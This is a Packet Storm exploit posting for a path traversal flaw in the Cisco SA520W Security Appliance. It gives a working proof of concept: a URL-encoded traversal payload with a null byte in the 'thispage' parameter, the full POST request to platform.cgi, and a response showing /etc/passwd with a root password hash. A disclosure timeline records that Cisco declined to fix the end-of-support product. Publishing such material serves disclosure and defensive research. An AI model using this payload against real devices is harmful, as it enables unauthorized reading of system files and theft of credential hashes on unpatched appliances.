what you don't know can hurt you

Cisco SA520W Security Appliance Path Traversal

Cisco SA520W Security Appliance Path Traversal
Posted May 18, 2018
Authored by Nassim Asrir

Cisco SA520W Security Appliance suffers from a path traversal vulnerability.

tags | exploit, file inclusion
systems | cisco
MD5 | d8f45b8bfc45f6a23ec142f301ed9a58

Cisco SA520W Security Appliance Path Traversal

Change Mirror Download
# Title: Cisco SA520W Security Appliance - Path Traversal
# Author: Nassim Asrir
# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.cisco.com/
# About Product:
===============
Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees.
They combine firewall, VPN, and optional intrusion prevention system (IPS), email, and web security capabilities. Whether in the office or working remotely, your employees can securely access the resources they need, while your business is protected from unauthorized access and Internet threats.

# POC
====================

//In our poc we will try to read /etc/passwd

The vulnerable Parameter: thispage

payload: ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm

Request Type: POST

Request:
=======

POST /scgi-bin/platform.cgi HTTP/1.1
Host: host-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://70.186.255.169/scgi-bin/platform.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
Connection: close
Upgrade-Insecure-Requests: 1

thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0

Response:
========

HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 00:00:41 GMT
Server: Embedded HTTP Server.
Connection: close
root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false

#Timeline:
=========

18 Apr 2018 : First Contact with Cisco.
18 Apr 2018 : Cisco Ask me for more details about the vulnerability.
18 Apr 2018 : Details sent to Cisco
19 Apr 2018 : Ask for update
15 May 2018 : Cisco say "The product you reference went end of support in April 2016 No further action will be taken."
18 May 2018 : Public Disclosure


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close